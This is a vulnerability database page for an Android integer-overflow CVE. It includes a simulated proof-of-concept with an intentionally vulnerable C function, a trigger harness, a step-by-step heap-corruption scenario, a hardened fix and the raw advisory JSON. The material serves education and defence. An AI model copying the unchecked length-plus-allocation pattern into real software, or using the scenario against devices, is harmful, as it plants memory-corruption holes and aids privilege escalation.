Security Vulnerability Report
CVE-2025-36936 CVSS 7.8 HIGH

CVE-2025-36936

Published: 2025-12-11 20:15:58
Last Modified: 2026-01-05 21:16:10

Description

In GetTachyonCommand of tachyon_server_common.h, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:google:android:-:*:*:*:*:*:*:* - VULNERABLE
Android (builds without the December 2025 security patch)
Pixel devices (not updated to the 2025-12-01 security patch level)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

/* Simulated vulnerable GetTachyonCommand. This is an illustrative model of
 * the bug class the advisory describes (CWE-190 leading to a heap
 * out-of-bounds write), not the actual source of tachyon_server_common.h,
 * which is not public. */
typedef struct {
    char* buffer;
    size_t length;
    uint32_t command_id;
} TachyonCommand;

int GetTachyonCommand(char* input, size_t input_len, TachyonCommand* cmd) {
    /* Vulnerable: integer overflow in the length calculation.
     * If input_len > SIZE_MAX - sizeof(uint32_t), the addition wraps
     * and total_len becomes a small value. */
    size_t total_len = input_len + sizeof(uint32_t);

    /* The buffer is sized from the possibly wrapped length. */
    cmd->buffer = (char*)malloc(total_len);
    if (!cmd->buffer) return -1;

    /* The copy still uses the original input_len, so when total_len wrapped
     * this writes far past the end of the allocation (heap OOB write). */
    memcpy(cmd->buffer, input, input_len);

    /* The command ID is appended after the input data. */
    memcpy(cmd->buffer + input_len, &cmd->command_id, sizeof(uint32_t));
    cmd->length = total_len;
    return 0;
}

/* Proof-of-concept trigger harness. */
int main(int argc, char* argv[]) {
    if (argc < 2) {
        printf("Usage: %s <malicious_input_file>\n", argv[0]);
        return 1;
    }
    FILE* fp = fopen(argv[1], "rb");
    if (!fp) {
        printf("Cannot open input file\n");
        return 1;
    }

    /* Read the input file into memory. Caveat: a length obtained from
     * ftell() can never approach SIZE_MAX, so feeding this harness from a
     * file cannot make the addition in GetTachyonCommand wrap. The overflow
     * only matters where input_len is attacker-controlled directly, as in
     * the scenario below; the harness merely exercises the code path. */
    fseek(fp, 0, SEEK_END);
    long file_len = ftell(fp);
    fseek(fp, 0, SEEK_SET);
    if (file_len < 0) {
        fclose(fp);
        return 1;
    }
    size_t file_size = (size_t)file_len;

    char* malicious_data = (char*)malloc(file_size ? file_size : 1);
    if (!malicious_data) {
        fclose(fp);
        return 1;
    }
    if (fread(malicious_data, 1, file_size, fp) != file_size) {
        printf("Short read\n");
        free(malicious_data);
        fclose(fp);
        return 1;
    }
    fclose(fp);

    TachyonCommand cmd;
    memset(&cmd, 0, sizeof(TachyonCommand));

    printf("Triggering CVE-2025-36936 integer overflow...\n");

    /* This call exercises the vulnerable length calculation. */
    int result = GetTachyonCommand(malicious_data, file_size, &cmd);
    if (result == 0 && cmd.buffer) {
        printf("Command processed, potential OOB write occurred\n");
        free(cmd.buffer);
    }
    free(malicious_data);
    return result;
}

/* Attack scenario modelled by this PoC:
 * 1. Supply an input_len close to SIZE_MAX - sizeof(uint32_t).
 * 2. total_len wraps and becomes a small value.
 * 3. malloc() returns a small heap chunk.
 * 4. memcpy() writes the full input_len bytes into that chunk.
 * 5. Adjacent heap memory is corrupted (out-of-bounds write).
 * 6. Per the advisory, such corruption can be leveraged for local
 *    escalation of privilege; which heap objects are reachable depends on
 *    the real process's layout and is not detailed here. */
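The fix a practitioner would look for is the check that the simulated PoC omits: validate the length before arithmetic, allocation and copy. The block below is an added example, not the page's PoC and not Google's code; the TachyonCommand layout mirrors the simulation above, and TACHYON_MAX_INPUT, GetTachyonCommandChecked, checked_add_size and the sample payload are assumptions made for illustration. It shows the wrapped value the unchecked addition produces and the hardened handler refusing the same length before any memory is touched.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical command record mirroring the shape of the simulated PoC;
 * not the real Tachyon structure. */
typedef struct {
    char *buffer;
    size_t length;
    uint32_t command_id;
} TachyonCommand;

/* Computes input_len + sizeof(uint32_t) the way the vulnerable model does.
 * size_t arithmetic wraps modulo SIZE_MAX + 1, so a huge length yields a
 * tiny allocation size. Returned for inspection only; nothing is allocated. */
size_t unchecked_total_len(size_t input_len)
{
    return input_len + sizeof(uint32_t);
}

/* Overflow-safe addition: returns false (and leaves *out untouched) when
 * a + b would exceed SIZE_MAX. Portable C99; GCC and Clang also provide
 * __builtin_add_overflow for the same purpose. */
bool checked_add_size(size_t a, size_t b, size_t *out)
{
    if (a > SIZE_MAX - b)
        return false;
    *out = a + b;
    return true;
}

/* Assumed policy limit for one command payload; not a value from the advisory. */
#define TACHYON_MAX_INPUT ((size_t)64 * 1024)

/* Hardened variant: the length is checked against an explicit upper bound
 * and an overflow-safe add before any allocation or copy happens.
 * Returns 0 on success, -1 on rejection or allocation failure. */
int GetTachyonCommandChecked(const char *input, size_t input_len,
                             uint32_t command_id, TachyonCommand *cmd)
{
    size_t total_len;

    if (input == NULL || cmd == NULL)
        return -1;
    /* Rejecting oversized input alone makes the wrap unreachable; the
     * explicit checked add documents the intent and survives refactoring. */
    if (input_len > TACHYON_MAX_INPUT)
        return -1;
    if (!checked_add_size(input_len, sizeof(uint32_t), &total_len))
        return -1;

    cmd->buffer = malloc(total_len);
    if (cmd->buffer == NULL)
        return -1;
    memcpy(cmd->buffer, input, input_len);
    memcpy(cmd->buffer + input_len, &command_id, sizeof(command_id));
    cmd->length = total_len;
    cmd->command_id = command_id;
    return 0;
}

/* Reads the trailing command id back out of a parsed command. */
uint32_t command_id_from_buffer(const TachyonCommand *cmd)
{
    uint32_t id;
    memcpy(&id, cmd->buffer + cmd->length - sizeof(uint32_t), sizeof(id));
    return id;
}

int main(void)
{
    /* Constructed sample payload, not captured traffic. */
    const char payload[] = "hello tachyon";
    TachyonCommand cmd = {0};

    printf("unchecked: (SIZE_MAX - 1) + 4 wraps to %zu\n",
           unchecked_total_len(SIZE_MAX - 1));

    if (GetTachyonCommandChecked(payload, sizeof(payload) - 1, 0x1234u, &cmd) == 0) {
        printf("accepted %zu bytes, id 0x%x\n", cmd.length,
               (unsigned)command_id_from_buffer(&cmd));
        free(cmd.buffer);
    }
    /* The length that would wrap is refused before malloc/memcpy run. */
    printf("huge length rejected: %s\n",
           GetTachyonCommandChecked(payload, SIZE_MAX - 1, 0, &cmd) == -1 ? "yes" : "no");
    return 0;
}
```

The upper bound and the checked add are deliberately both present: a maximum payload size is the control that matters in practice, while the explicit overflow check keeps the function correct if the limit is later raised or removed.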

References

https://source.android.com/security/bulletin/pixel/2025-12-01 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36936", "sourceIdentifier": "[email protected]", "published": "2025-12-11T20:15:58.140", "lastModified": "2026-01-05T21:16:10.260", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In GetTachyonCommand of tachyon_server_common.h, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:-:*:*:*:*:*:*:*", "matchCriteriaId": "F8B9FEC8-73B6-43B8-B24E-1F7C20D91D26"}]}]}], "references": [{"url": "https://source.android.com/security/bulletin/pixel/2025-12-01", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}